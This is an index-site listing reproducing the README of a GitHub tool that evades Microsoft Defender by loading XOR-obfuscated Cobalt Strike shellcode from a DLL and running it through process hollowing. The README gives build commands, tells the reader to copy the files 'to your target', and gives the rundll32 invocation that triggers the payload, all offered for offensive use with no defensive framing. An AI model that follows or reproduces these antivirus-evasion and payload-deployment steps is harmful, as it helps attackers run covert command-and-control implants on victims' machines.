Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.


https://github.com/processust/cobaltstrikebypassdefender

A launcher that loads a DLL containing XORed Cobalt Strike shellcode, which is executed in memory through the process hollowing technique

cobalt dll hollowing malware process shellcode strike

Last synced: about 2 months ago

README

        

# CobaltStrikeBypassDefender


A launcher that loads a DLL containing XORed Cobalt Strike shellcode, which is executed in memory through the process hollowing technique




-----------------------------------------------------


My YouTube video on this repo:








-----------------------------------------------------

### Usage

1. Generate x64 Cobalt Strike shellcode with CSSG:
```
https://github.com/RCStep/CSSG
```
2. Copy your shellcode into obfu.cpp (in the "ANTIVIRUS_EXCLUDED_FOLDER" folder) and compile it:
```
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o obfu.exe obfu.cpp
```
3. Execute obfu.exe and give your own XOR secret.
4. Copy the content of obfuscated-shellcode.cpp into the dll.cpp file and update the shellcode char array variable in the process hollowing functions.
5. Compile dll.cpp and launcher.cpp:
```
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o shellcode.dll -shared dll.cpp

C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o launcher.exe launcher.cpp
```
6. Copy launcher.exe, shellcode.dll and the 3 library files to your target, then execute launcher.exe or trigger the RunThatShit function with rundll32:
```
rundll32 shellcode.dll, RunThatShit
```
7. Enjoy :)


-----------------------------------------------------------------------------------




My blog: https://lestutosdeprocessus.fr




My Discord server: https://discord.gg/JJNxV2h